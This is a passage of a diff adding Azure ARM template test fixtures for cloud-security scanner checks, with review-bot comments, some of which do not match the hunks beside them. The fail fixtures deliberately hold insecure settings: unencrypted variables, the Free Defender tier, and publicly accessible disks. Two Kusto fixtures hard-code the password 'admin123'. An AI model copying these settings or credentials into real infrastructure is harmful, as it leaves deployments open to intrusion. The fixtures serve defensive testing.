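Review bot: This slot fixture sets `"httpsOnly": false` explicitly, but no fail fixture in the commit omits the key; Azure documents the default for `httpsOnly` as false, so a slot with the property absent still accepts plain-HTTP traffic and the check should presumably fail it as well. Add a third slot fixture with `httpsOnly` left out so the absent-key behavior is pinned, mirroring what pass2.json does for the DebugDisabled check. The `"remoteDebuggingEnabled": "bool"` placeholder is irrelevant to this check and can stay, but differs from the explicit `false` used in fail.json, which is worth keeping consistent so the fixtures are not mistaken for one another.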
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": true, + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "is try string to app service disallow cors" + ], + 
"supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + 
"kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": false, + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass2.json b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass2.json new file mode 100644 index 00000000000..e1303d3339e --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass2.json 
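Review bot: The `cors.allowedOrigins` entry in this pass fixture reads `"is try string to app service disallow cors"`, which looks like a leftover from another check's fixture rather than a value the HTTPS-only test needs; pass2.json in the next hunk uses the neutral `"string"` placeholder at the same position, so this one should probably match. The fixture also diverges from its sibling in `"remoteDebuggingEnabled": false` versus `"bool"`, which is equally unrelated to `httpsOnly`. If the check only reads `properties.httpsOnly` these differences are harmless, but keeping the placeholders uniform makes it obvious which property each fixture is exercising.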
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "pass2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": true, + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + 
"defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + 
"dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/fail.json b/tests/arm/checks/resource/example_AutomationEncrypted/fail.json new file mode 100644 index 00000000000..51f1623379f --- /dev/null +++ b/tests/arm/checks/resource/example_AutomationEncrypted/fail.json 
@@ -0,0 +1,22 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {},
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.Automation/automationAccounts/variables",
+ "apiVersion": "2020-01-13-preview",
+ "name": "fail",
+ "properties": {
+ "name": "tfex-example-var",
+ "value": "Hello, Arm Basic Test.",
+ "isEncrypted": false
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Automation/automationAccounts', 'example')]"
+ ]
+ }
+ ],
+ "outputs": {}
+}
diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json b/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json
new file mode 100644
index 00000000000..b416528b505
--- /dev/null
+++ b/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {},
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.Automation/automationAccounts/variables",
+ "apiVersion": "2020-01-13-preview",
+ "name": "fail1",
+ "properties": {
+ "name": "tfex-example-var",
+ "value": "Hello, Arm Basic Test."
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Automation/automationAccounts', 'example')]"
+ ]
+ }
+ ],
+ "outputs": {}
+}
diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/pass.json b/tests/arm/checks/resource/example_AutomationEncrypted/pass.json
new file mode 100644
index 00000000000..cca3b5d5366
--- /dev/null
+++ b/tests/arm/checks/resource/example_AutomationEncrypted/pass.json
@@ -0,0 +1,22 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {},
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.Automation/automationAccounts/variables",
+ "apiVersion": "2020-01-13-preview",
+ "name": "pass",
+ "properties": {
+ "name": "tfex-example-var",
+ "value": "Hello, Arm Basic Test.",
+ "isEncrypted": true
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Automation/automationAccounts', 'example')]"
+ ]
+ }
+ ],
+ "outputs": {}
+}
diff --git a/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json
new file mode 100644
index 00000000000..9336aeba462
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json
@@ -0,0 +1,106 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "5620168434409602803" + } + }, + "parameters": { + "batchAccountName": { + "type": "string", + "defaultValue": "[format('{0}batch', toLower(uniqueString(resourceGroup().id)))]", + "metadata": { + "description": "Batch Account Name" + } + }, + "storageAccountsku": { + "type": "string", + "defaultValue": "Standard_LRS", + "allowedValues": [ + "Standard_LRS", + "Standard_GRS", + "Standard_ZRS", + "Premium_LRS" + ], + "metadata": { + "description": "Storage Account type" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "storageAccountName": "[format('{0}storage', uniqueString(resourceGroup().id))]" + }, + "resources": [ + { + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2023-01-01", + "name": "[variables('storageAccountName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('storageAccountsku')]" + }, + "kind": "StorageV2", + "tags": { + "ObjectName": "[variables('storageAccountName')]" + }, + "properties": { + "minimumTlsVersion": "TLS1_2", + "allowBlobPublicAccess": false, + "networkAcls": { + "defaultAction": "Deny" + }, + "supportsHttpsTrafficOnly": true + } + }, + { + "type": "Microsoft.Batch/batchAccounts", + "apiVersion": "2024-02-01", + "name": "fail", + "location": "[parameters('location')]", + "tags": { + "ObjectName": "[parameters('batchAccountName')]" + }, + "properties": { + "autoStorage": { + "storageAccountId": "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + } + + }, + "dependsOn": [ + "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + ] + } + ], + 
"outputs": { + "storageAccountName": { + "type": "string", + "value": "[variables('storageAccountName')]" + }, + "batchAccountName": { + "type": "string", + "value": "[parameters('batchAccountName')]" + }, + "location": { + "type": "string", + "value": "[parameters('location')]" + }, + "resourceGroupName": { + "type": "string", + "value": "[resourceGroup().name]" + }, + "resourceId": { + "type": "string", + "value": "[resourceId('Microsoft.Batch/batchAccounts', parameters('batchAccountName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json new file mode 100644 index 00000000000..e0cf6278352 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json 
@@ -0,0 +1,109 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "5620168434409602803" + } + }, + "parameters": { + "batchAccountName": { + "type": "string", + "defaultValue": "[format('{0}batch', toLower(uniqueString(resourceGroup().id)))]", + "metadata": { + "description": "Batch Account Name" + } + }, + "storageAccountsku": { + "type": "string", + "defaultValue": "Standard_LRS", + "allowedValues": [ + "Standard_LRS", + "Standard_GRS", + "Standard_ZRS", + "Premium_LRS" + ], + "metadata": { + "description": "Storage Account type" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "storageAccountName": "[format('{0}storage', uniqueString(resourceGroup().id))]" + }, + "resources": [ + { + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2023-01-01", + "name": "[variables('storageAccountName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('storageAccountsku')]" + }, + "kind": "StorageV2", + "tags": { + "ObjectName": "[variables('storageAccountName')]" + }, + "properties": { + "minimumTlsVersion": "TLS1_2", + "allowBlobPublicAccess": false, + "networkAcls": { + "defaultAction": "Deny" + }, + "supportsHttpsTrafficOnly": true + } + }, + { + "type": "Microsoft.Batch/batchAccounts", + "apiVersion": "2024-02-01", + "name": "pass", + "location": "[parameters('location')]", + "tags": { + "ObjectName": "[parameters('batchAccountName')]" + }, + "properties": { + "autoStorage": { + "storageAccountId": "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + }, + "keyVaultReference": { + "id": "test", + "url": "https://test.com" + } + }, + "dependsOn": [ + 
"[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + ] + } + ], + "outputs": { + "storageAccountName": { + "type": "string", + "value": "[variables('storageAccountName')]" + }, + "batchAccountName": { + "type": "string", + "value": "[parameters('batchAccountName')]" + }, + "location": { + "type": "string", + "value": "[parameters('location')]" + }, + "resourceGroupName": { + "type": "string", + "value": "[resourceGroup().name]" + }, + "resourceId": { + "type": "string", + "value": "[resourceId('Microsoft.Batch/batchAccounts', parameters('batchAccountName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/fail.json b/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/fail.json new file mode 100644 index 00000000000..3c857a7aaa2 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/fail.json @@ -0,0 +1,25 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "apiVersion": "2018-06-01", + "type": "Microsoft.Kusto/clusters", + "location": "West Europe", + "name": "fail", + "sku": { + "name": "B_Gen5_2", + "size": "5120" + }, + "properties": { + "version": "10.3", + "administratorLogin": "admin", + "administratorLoginPassword": "admin123", + "enableDoubleEncryption": false, + "storageProfile": { + "storageMB": "5120" + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/pass.json b/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/pass.json new file mode 100644 index 00000000000..051774bb852 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/pass.json 
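Review bot: The Kusto cluster fixture carries a literal `"administratorLoginPassword": "admin123"` next to `administratorLogin`, `version` and `storageProfile`, which do not look like `Microsoft.Kusto/clusters` properties (they resemble a database-server template); pass.json in the next hunk has the same block. The check presumably reads only `properties.enableDoubleEncryption`, so the extra fields do not change the outcome, but a hard-coded credential in a committed fixture is exactly what secret scanners flag, and it can be removed from both files without affecting what the test exercises. If the other fields are kept on purpose as parser noise, a `"name"` such as `"not-a-kusto-property"` would make that intent visible.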
@@ -0,0 +1,25 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "apiVersion": "2018-06-01",
+ "type": "Microsoft.Kusto/clusters",
+ "location": "West Europe",
+ "name": "pass",
+ "sku": {
+ "name": "B_Gen5_2",
+ "size": "5120"
+ },
+ "properties": {
+ "version": "10.3",
+ "administratorLogin": "admin",
+ "administratorLoginPassword": "admin123",
+ "enableDoubleEncryption": true,
+ "storageProfile": {
+ "storageMB": "5120"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/fail.json b/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/fail.json
new file mode 100644
index 00000000000..2067162de1c
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/fail.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Security/pricings",
+ "apiVersion": "2024-01-01",
+ "name": "KeyVaults",
+ "properties": {
+ "pricingTier": "Free",
+ "extensions": [
+ {
+ "name": "KeyVaults"
+ }
+ ]
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/pass.json b/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/pass.json
new file mode 100644
index 00000000000..e78c0ab0802
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/pass.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Security/pricings",
+ "apiVersion": "2024-01-01",
+ "name": "KeyVaults",
+ "properties": {
+ "pricingTier": "Standard",
+ "extensions": [
+ {
+ "name": "KeyVaults"
+ }
+ ]
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/fail.json b/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/fail.json
new file mode 100644
index 00000000000..9c5f5f63c43
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/fail.json
@@ -0,0 +1,51 @@
+{
+"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+"contentVersion": "1.0.0.0",
+"parameters": {
+ "pricing": {
+ "type": "string",
+ "allowedValues": [
+ "Standard",
+ "Free"
+ ]
+ }
+},
+
+"resources": [
+ {
+ "type": "Microsoft.Security/pricings",
+ "apiVersion": "2017-08-01-preview",
+ "name": "KubernetesService",
+ "properties": {
+ "pricingTier": "Free"
+ }
+ },
+ {
+ "type": "Microsoft.Compute/disks",
+ "apiVersion": "2023-01-02",
+ "name": "[parameters('disks_acctestmd1_name')]",
+ "location": "westus2",
+ "tags": {
+ "environment": "staging"
+ },
+ "sku": {
+ "name": "Standard_LRS",
+ "tier": "Standard"
+ },
+ "properties": {
+ "creationData": {
+ "createOption": "Empty"
+ },
+ "diskSizeGB": 1,
+ "diskIOPSReadWrite": 500,
+ "diskMBpsReadWrite": 60,
+ "encryption": {
+ "type": "EncryptionAtRestWithPlatformKey"
+ },
+ "networkAccessPolicy": "AllowAll",
+ "publicNetworkAccess": "Enabled",
+ "diskState": "Unattached"
+ }
+ }
+
+]}
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/pass.json b/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/pass.json
new file mode 100644
index 00000000000..ce58fcf63a0
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/pass.json
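Review bot: The second resource in this fail fixture, a `Microsoft.Compute/disks` with `"publicNetworkAccess": "Enabled"` and `"networkAccessPolicy": "AllowAll"`, has nothing to do with a Defender-on-Kubernetes pricing check and references `parameters('disks_acctestmd1_name')`, which the `parameters` block never declares. If it was added deliberately to prove the check ignores unrelated resource types, a `"tags": {"purpose": "unrelated resource, must be ignored by the check"}` entry would say so; otherwise dropping it keeps the fixture to the one resource under test, as pass.json in the next hunk does with its three pricings resources.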
@@ -0,0 +1,49 @@
+{
+"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+"contentVersion": "1.0.0.0",
+"parameters": {
+ "pricing": {
+ "type": "string",
+ "allowedValues": [
+ "Standard",
+ "Free"
+ ]
+ }
+},
+"resources": [
+
+ {
+ "type": "Microsoft.Security/pricings",
+ "apiVersion": "2018-06-01",
+ "name": "KubernetesService",
+ "dependsOn": [
+ "[concat('Microsoft.Security/pricings/default')]"
+ ],
+ "properties": {
+ "pricingTier": "Standard"
+ }
+ },
+ {
+ "type": "Microsoft.Security/pricings",
+ "apiVersion": "2018-06-01",
+ "name": "KeyVaults",
+ "dependsOn": [
+ "[concat('Microsoft.Security/pricings/SqlServers')]"
+ ],
+ "properties": {
+ "pricingTier": "Standard"
+ }
+ },
+ {
+ "type": "Microsoft.Security/pricings",
+ "apiVersion": "2018-06-01",
+ "name": "SqlServerVirtualMachines",
+ "dependsOn": [
+ "[concat('Microsoft.Security/pricings/AppServices')]"
+ ],
+ "properties": {
+ "pricingTier": "Standard"
+ }
+ }
+]
+}
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/fail.json b/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/fail.json
new file mode 100644
index 00000000000..68beade1e4e
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/fail.json
@@ -0,0 +1,20 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
